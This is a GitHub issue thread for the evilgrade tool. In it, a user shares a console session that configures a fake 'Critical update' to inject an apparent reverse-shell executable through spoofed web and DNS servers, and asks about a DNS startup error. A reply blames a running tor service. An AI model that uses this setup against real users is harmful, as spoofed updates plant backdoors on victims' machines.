evilgrade icon indicating copy to clipboard operation
evilgrade copied to clipboard

error in initiating DNS SERVER

Open boss0608 opened this issue 5 years ago • 1 comments

whenever i try to start evilgrade i always get this problem you can see that below i have pasted that and please help me resolving this problem evilgrade>show options

Display options:

.------------------------------------------------------------------------------------------------. | Name | Default | Description | +-------------+------------------------+---------------------------------------------------------+ | port | 80 | Webserver listening port | | debug | 1 | Debug mode | | DNSPort | 53 | Listen Name Server port | | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | faraday | 0 | Enable RPC Faraday connection | | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) | | RPCfaraday | http://127.0.0.1:9876/ | Faraday RPC Server | | sslport | 443 | Webserver SSL listening port | '-------------+------------------------+---------------------------------------------------------'

evilgrade>config dap evilgrade(dap)>set agent /var/www/html/evilleaks/rev_http_main.exe set agent, /var/www/html/evilleaks/rev_http_main.exe evilgrade(dap)>show options

Display options:

Name = Download Accelerator Version = 1.0 Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"] Description = "" VirtualHost = "(update.speedbit.com)"

.----------------------------------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-------------------------------------------------+------------------------------------------+ | endsite | update.speedbit.com/updateok.html | Website display when finish update | | enable | 1 | Status | | description | This critical update fix internal vulnerability | Description display in the update | | title | Critical update | Title name display in the update | | failsite | www.speedbit.com/finishupdate.asp?noupdate=&R=0 | Website display when did't finish update | | agent | /var/www/html/evilleaks/rev_http_main.exe | Agent to inject | '-------------+-------------------------------------------------+------------------------------------------'

evilgrade(dap)>start evilgrade(dap)> [5/3/2020:13:36:13] - [WEBSERVER] - Webserver ready. Waiting for connections ...

evilgrade(dap)> [5/3/2020:13:36:13] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...

evilgrade(dap)>

Error: [DNSSERVER] - Error Initiating DNS Server

boss0608 avatar Mar 05 '20 18:03 boss0608

Here your DNS server is already is running , most probably your tor service maybe . So , type this command

sudo service tor stop

Now try again .

vulnbreave avatar Oct 11 '21 18:10 vulnbreave